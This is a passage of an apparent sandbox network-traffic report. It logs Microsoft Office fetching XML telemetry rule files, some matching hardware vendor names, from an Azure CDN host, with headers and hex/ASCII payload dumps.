                                              2024-10-25 13:46:04 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              90192.168.2.44983713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:05 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:05 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:05 GMT
                                              Content-Type: text/xml
                                              Content-Length: 472
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                              ETag: "0x8DC582B91EAD002"
                                              x-ms-request-id: ff288f8c-c01e-007a-5a0e-26b877000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134605Z-r197bdfb6b42rt68rzg9338g1g00000001n000000000fxmh
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              91192.168.2.44983913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:05 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:05 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:05 GMT
                                              Content-Type: text/xml
                                              Content-Length: 475
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                              ETag: "0x8DC582BBA740822"
                                              x-ms-request-id: cfffa7b8-401e-0064-673b-2654af000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134605Z-16849878b78q4pnrt955f8nkx8000000096000000000am2v
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:05 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              92192.168.2.44983813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:05 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:05 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:05 GMT
                                              Content-Type: text/xml
                                              Content-Length: 432
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                              ETag: "0x8DC582BAABA2A10"
                                              x-ms-request-id: 63249b2a-c01e-0046-2e2c-262db9000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134605Z-r197bdfb6b4bq7nf8mnywhn9e000000001sg00000000176e
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:05 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              93192.168.2.44984013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:05 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:06 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:05 GMT
                                              Content-Type: text/xml
                                              Content-Length: 427
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                              ETag: "0x8DC582BB464F255"
                                              x-ms-request-id: 796b115c-001e-005a-3627-26c3d0000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134605Z-17c5cb586f6f69jxsre6kx2wmc00000002w000000000c1u9
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              94192.168.2.44984213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:06 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:06 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:06 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                              ETag: "0x8DC582BA6CF78C8"
                                              x-ms-request-id: c82c03e6-f01e-001f-0cf2-245dc8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134606Z-15b8d89586f8nxpt6ys645x5v000000001ug000000005vu3
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              95192.168.2.44984113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:06 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:06 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:06 GMT
                                              Content-Type: text/xml
                                              Content-Length: 474
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                              ETag: "0x8DC582BA4037B0D"
                                              x-ms-request-id: 135f94f0-d01e-002b-2a55-2225fb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134606Z-16849878b78dsttbr1qw36rxs800000009b0000000008fx6
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:06 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              96192.168.2.44984313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:06 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:06 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:06 GMT
                                              Content-Type: text/xml
                                              Content-Length: 472
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                              ETag: "0x8DC582B984BF177"
                                              x-ms-request-id: 39b78571-501e-0016-43f4-24181b000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134606Z-15b8d89586f2hk28h0h6zye26c000000031000000000990f
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              97192.168.2.44984413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:06 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:06 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:06 GMT
                                              Content-Type: text/xml
                                              Content-Length: 405
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                              ETag: "0x8DC582B942B6AFF"
                                              x-ms-request-id: 23333e9c-201e-003f-1e18-266d94000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134606Z-17c5cb586f62blg5ss55p9d6fn000000016g000000002rdt
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:06 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              98192.168.2.44984513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:06 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:06 GMT
                                              Content-Type: text/xml
                                              Content-Length: 468
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                              ETag: "0x8DC582BBA642BF4"
                                              x-ms-request-id: 2f548e5b-201e-003c-5d24-2130f9000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134606Z-16849878b787sbpl0sv29sm89s00000009cg00000000aver
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              99192.168.2.44984713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:07 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1952
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                              ETag: "0x8DC582B956B0F3D"
                                              x-ms-request-id: bb28544f-801e-0047-7562-267265000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134607Z-16849878b78fssff8btnns3b1400000000w000000000d3sz
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              100192.168.2.44984613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:07 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:07 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:07 GMT
                                              Content-Type: text/xml
                                              Content-Length: 174
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                              ETag: "0x8DC582B91D80E15"
                                              x-ms-request-id: 013f0f94-801e-00ac-2ef3-24fd65000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134607Z-15b8d89586f5s5nz3ffrgxn5ac000000014000000000bhku
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:07 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
